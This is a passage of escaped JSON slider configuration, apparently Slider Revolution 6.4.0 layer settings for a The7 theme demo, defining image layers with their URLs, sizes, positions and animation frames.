To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":7550,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"effects\":{\"parallax\":\"4\"},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"visible\":false,\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.4.0\"},\"14\":{\"text\":\"Image 14\",\"alias\":\"2l\",\"uid\":14,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/art-0002-left.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"738px\",\"e\":true},\"n\":{\"v\":\"738px\"},\"t\":{\"v\":\"738px\",\"e\":true},\"m\":{\"v\":\"738px\"}},\"height\":{\"d\":{\"v\":\"791px\",\"e\":true},\"n\":{\"v\":\"791px\"},\"t\":{\"v\":\"791px\",\"e\":true},\"m\":{\"v\":\"791px\"}},\"originalWidth\":738,\"originalHeight\":791,\"aspectRatio\":{\"d\":{\"v\":0.93299620733249},\"n\":{\"v\":0.93299620733249},\"t\":{\"v\":0.93299620733249},\"m\":{\"v\":0.93299620733249}}},\"position\":{\"x\":{\"d\":{\"v\":\"18px\",\"e\":true},\"n\":{\"v\":\"18px\"},\"t\":{\"v\":\"55px\",\"e\":true},\"m\":{\"v\":\"55px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-81px\",\"e\":true},\"n\":{\"v\":\"-81px\"},\"t\":{\"v\":\"266px\",\"e\":true},\"m\":{\"v\":\"266px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\"}},\"zIndex\":8,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":450},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-100px\"},\"n\":{\"v\":\"-100px\"},\"t\":{\"v\":\"-100px\"},\"m\":{\"v\":\"-100px\"}},\"y\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":450,\"startRelative\":450},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":450,\"startRelative\":450},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":7550,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"effects\":{\"parallax\":\"4\"},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"visible\":false,\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.4.0\"},\"13\":{\"text\":\"Image 13\",\"alias\":\"1l\",\"uid\":13,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/art-1-left.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"844px\",\"e\":true},\"n\":{\"v\":\"844px\"},\"t\":{\"v\":\"844px\",\"e\":true},\"m\":{\"v\":\"844px\"}},\"height\":{\"d\":{\"v\":\"958px\",\"e\":true},\"n\":{\"v\":\"958px\"},\"t\":{\"v\":\"958px\",\"e\":true},\"m\":{\"v\":\"958px\"}},\"originalWidth\":844,\"originalHeight\":958,\"aspectRatio\":{\"d\":{\"v\":0.88100208768267},\"n\":{\"v\":0.88100208768267},\"t\":{\"v\":0.88100208768267},\"m\":{\"v\":0.88100208768267}}},\"position\":{\"x\":{\"d\":{\"v\":\"-165px\",\"e\":true},\"n\":{\"v\":\"-165px\"},\"t\":{\"v\":\"-165px\",\"e\":true},\"m\":{\"v\":\"-165px\"}},\"y\":{\"d\":{\"v\":\"-216px\",\"e\":true},\"n\":{\"v\":\"-216px\"},\"t\":{\"v\":\"-216px\",\"e\":true},\"m\":{\"v\":\"-216px\"}},\"horizontal\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\"}},\"zIndex\":9,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":300},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-100px\"},\"n\":{\"v\":\"-100px\"},\"t\":{\"v\":\"-100px\"},\"m\":{\"v\":\"-100px\"}},\"y\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":7700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"effects\":{\"parallax\":\"1\"},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"visible\":false,\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.4.0\"},\"16\":{\"text\":\"Image 16\",\"alias\":\"1r\",\"uid\":16,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/art-1-right.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"1114px\",\"e\":true},\"n\":{\"v\":\"1114px\"},\"t\":{\"v\":\"1114px\"},\"m\":{\"v\":\"1114px\"}},\"height\":{\"d\":{\"v\":\"921px\",\"e\":true},\"n\":{\"v\":\"921px\"},\"t\":{\"v\":\"921px\"},\"m\":{\"v\":\"921px\"}},\"originalWidth\":1114,\"originalHeight\":921,\"aspectRatio\":{\"d\":{\"v\":1.2095548317047},\"n\":{\"v\":1.2095548317047},\"t\":{\"v\":1.2095548317047},\"m\":{\"v\":1.2095548317047}}},\"position\":{\"x\":{\"d\":{\"v\":\"-149px\",\"e\":true},\"n\":{\"v\":\"-149px\"},\"t\":{\"v\":\"-149px\"},\"m\":{\"v\":\"-149px\"}},\"y\":{\"d\":{\"v\":\"-154px\",\"e\":true},\"n\":{\"v\":\"-154px\"},\"t\":{\"v\":\"-154px\"},\"m\":{\"v\":\"-154px\"}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"zIndex\":10,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":300},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"y\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":7700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"effects\":{\"parallax\":\"1\"},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"visible\":false,\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.4.0\"},\"22\":{\"text\":\"Image 19\",\"alias\":\"Mob-img\",\"uid\":22,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/art-mob-slider.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"1024px\",\"e\":true},\"n\":{\"v\":\"1024px\"},\"t\":{\"v\":\"1024px\",\"e\":true},\"m\":{\"v\":\"1024px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"350px\",\"e\":true},\"n\":{\"v\":\"350px\"},\"t\":{\"v\":\"350px\",\"e\":true},\"m\":{\"v\":\"350px\",\"e\":true}},\"originalWidth\":1024,\"originalHeight\":350,\"aspectRatio\":{\"d\":{\"v\":2.9257142857143},\"n\":{\"v\":2.9257142857143},\"t\":{\"v\":2.9257142857143},\"m\":{\"v\":2.9257142857143}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-3px\",\"e\":true},\"n\":{\"v\":\"-3px\"},\"t\":{\"v\":\"-3px\",\"e\":true},\"m\":{\"v\":\"-3px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":11,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":300},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":300,\"startRelative\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim 